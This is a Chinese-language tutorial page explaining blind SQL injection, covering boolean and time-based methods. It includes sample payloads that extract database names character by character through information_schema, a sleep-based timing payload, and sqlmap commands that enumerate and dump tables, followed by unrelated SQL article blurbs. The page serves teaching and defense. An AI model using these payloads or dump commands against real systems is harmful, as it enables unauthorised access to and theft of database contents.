簡單了解SQL注入之盲注-SQL-PHP中文網

首頁

資料庫

SQL

簡單了解SQL注入之盲注

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 01, 2022 am 11:47 AM

sql

本篇文章為大家帶來了關於SQL的相關知識，其中主要介紹了關於盲注的相關問題，盲注將資料庫中查詢的資料結果截斷為單個字符，然後同構造邏輯語句，下面一起來看一下，希望對大家有幫助。

簡單了解SQL注入之盲注

推薦學習：《SQL教學》

#sql注入－盲注

##1.回顧

回顯注入主要應用於資料庫中的資料可以再網站的頁面上直接展示出來。

報錯注入主要應用於網站的頁面上存在原始報錯信息，資料庫中的數據在原始報錯信息中顯示出來。也稱為報錯回顯。
原理：由於使用者無法控制輸入，攻擊者可以任意的輸入惡意的sql語句，造成sql語意改變，從而引起資料庫和作業系統的風險。

風險：資料操作、登入繞過、檔案操作、命令執行、登錄機碼操作。

防禦：過濾、預編譯。

2.盲注漏洞場景

1.資料庫中的資料並不會在頁面上直接展示，將查詢出的結果通過判斷，將判斷之後的結果在頁面上輸出。如登入框

2.insert、update、delete等於語法不具備資料的查詢功能，頁面上就不會存在資料庫中的資料。如註冊、資訊修改、資料添加

3.盲注原理

核心將資料庫中查詢的資料結果截斷為單一字符，然後同構造邏輯語句。透過判斷頁面顯示是否異常或頁面是否示範來判斷資料庫中查詢的結果。

4.分類

1.bool盲注

若資料庫中可以查到對應的數據，頁面會正常顯示，反之異常。

2.時間盲注

無論輸入任何數據，頁面的效果完全一樣，根據頁面是否延遲判斷出資料庫中查詢出的結果。

5.流程

1.找疑似注入點找輸入點，找與資料庫有互動的地方

2.判斷sql注入是否存在建構惡意的sql語句，提交後頁面的回應資訊與預期保持一致，這說明注入存在。
3.取得資料庫名稱

1.获取当前数据库名
	and ascii(substr((select database()),1,1))=115
2.获取所有数据库名
	and (select ascii(substr(group_concat(schema_name),1,1)) from information_schema.schemata)>0

3.計算取得資料的長度

and (select length(group_concat(schema_name)) from information_schema.schemata)>10 --+

4.取得表格

5.取得列
6.取得資料

6.時間盲注

and if(((select database())='a'),sleep(5),0)--+

7.總結

可以發生回顯、報錯、bool注入的地方都可以發生時間盲注，反之不行可以發生回顯報錯的地方一定可以bool型盲注，反之不行。

8.sqlmap

sql注入自動化工具，python2開發的，可以相容python3。 sqlmap的使用其實就是模擬人對網站的請求過程，可以對所取得的資料做收集分析然後展示。

python sqlmap.py -h	查看sqlmap可使用的参数
                 -u 网站的url	向sqlmnap提供注入点

簡單了解SQL注入之盲注 –dbs 取得所有資料庫名稱

#-D 指定函式庫--tables 取得指定資料庫中所有的資料表的資訊

簡單了解SQL注入之盲注

-D 指定庫-T 指定表--columns

簡單了解SQL注入之盲注

#-D 指定庫-T 指定表-C 列1，列2 --dump

簡單了解SQL注入之盲注

-r '檔案名稱'

簡單了解SQL注入之盲注

推薦學習：《

SQL教學》

以上是簡單了解SQL注入之盲注的詳細內容。更多資訊請關注PHP中文網其他相關文章！

陳述

本文轉載於：CSDN。如有侵權，請聯絡admin@php.cn刪除

SQL：數據庫的語言解釋了Apr 27, 2025 am 12:14 AM

SQL是數據庫操作的核心工具，用於查詢、操作和管理數據庫。 1)SQL允許執行CRUD操作，包括數據查詢、操作、定義和控制。 2)SQL的工作原理包括解析、優化和執行三個步驟。 3)基本用法包括創建表、插入、查詢、更新和刪除數據。 4)高級用法涵蓋JOIN、子查詢和窗口函數。 5)常見錯誤包括語法、邏輯和性能問題，可通過數據庫錯誤信息、檢查查詢邏輯和使用EXPLAIN命令調試。 6)性能優化技巧包括創建索引、避免SELECT*和使用JOIN。

SQL：如何克服學習障礙Apr 26, 2025 am 12:25 AM

要成為SQL高手，應掌握以下策略：1.了解數據庫基礎概念，如表、行、列、索引。 2.學習SQL的核心概念和工作原理，包括解析、優化和執行過程。 3.熟練使用基本和高級SQL操作，如CRUD、複雜查詢和窗口函數。 4.掌握調試技巧，使用EXPLAIN命令優化查詢性能。 5.通過實踐、利用學習資源、重視性能優化和保持好奇心來克服學習挑戰。

SQL和數據庫：完美的合作夥伴關係Apr 25, 2025 am 12:04 AM

SQL與數據庫的關係是緊密結合的，SQL是管理和操作數據庫的工具。 1.SQL是一種聲明式語言，用於數據定義、操作、查詢和控制。 2.數據庫引擎解析SQL語句並執行查詢計劃。 3.基本用法包括創建表、插入和查詢數據。 4.高級用法涉及復雜查詢和子查詢。 5.常見錯誤包括語法、邏輯和性能問題，可通過語法檢查和EXPLAIN命令調試。 6.優化技巧包括使用索引、避免全表掃描和優化查詢。

SQL與MySQL：澄清兩者之間的關係Apr 24, 2025 am 12:02 AM

SQL是一種用於管理關係數據庫的標準語言，而MySQL是一個使用SQL的數據庫管理系統。 SQL定義了與數據庫交互的方式，包括CRUD操作，而MySQL實現了SQL標準並提供了額外的功能，如存儲過程和触發器。

SQL的重要性：數字時代的數據管理Apr 23, 2025 am 12:01 AM

SQL在數據管理中的作用是通過查詢、插入、更新和刪除操作來高效處理和分析數據。 1.SQL是一種聲明式語言，允許用戶以結構化方式與數據庫對話。 2.使用示例包括基本的SELECT查詢和高級的JOIN操作。 3.常見錯誤如忘記WHERE子句或誤用JOIN，可通過EXPLAIN命令調試。 4.性能優化涉及使用索引和遵循最佳實踐如代碼可讀性和可維護性。

SQL入門：基本概念和技能Apr 22, 2025 am 12:01 AM

SQL是一種用於管理和操作關係數據庫的語言。 1.創建表：使用CREATETABLE語句，如CREATETABLEusers(idINTPRIMARYKEY,nameVARCHAR(100),emailVARCHAR(100));2.插入、更新、刪除數據：使用INSERTINTO、UPDATE、DELETE語句，如INSERTINTOusers(id,name,email)VALUES(1,'JohnDoe','john@example.com');3.查詢數據：使用SELECT語句，如SELEC

SQL：語言，MySQL：數據庫管理系統Apr 21, 2025 am 12:05 AM

SQL和MySQL的關係是：SQL是用於管理和操作數據庫的語言，而MySQL是支持SQL的數據庫管理系統。 1.SQL允許進行數據的CRUD操作和高級查詢。 2.MySQL提供索引、事務和鎖機制來提升性能和安全性。 3.優化MySQL性能需關注查詢優化、數據庫設計和監控維護。

SQL的作用：管理和操縱數據Apr 20, 2025 am 12:02 AM

SQL用於數據庫管理和數據操作，核心功能包括CRUD操作、複雜查詢和優化策略。 1)CRUD操作：使用INSERTINTO創建數據，SELECT讀取數據，UPDATE更新數據，DELETE刪除數據。 2)複雜查詢：通過GROUPBY和HAVING子句處理複雜數據。 3)優化策略：使用索引、避免全表掃描、優化JOIN操作和分頁查詢來提升性能。

See all articles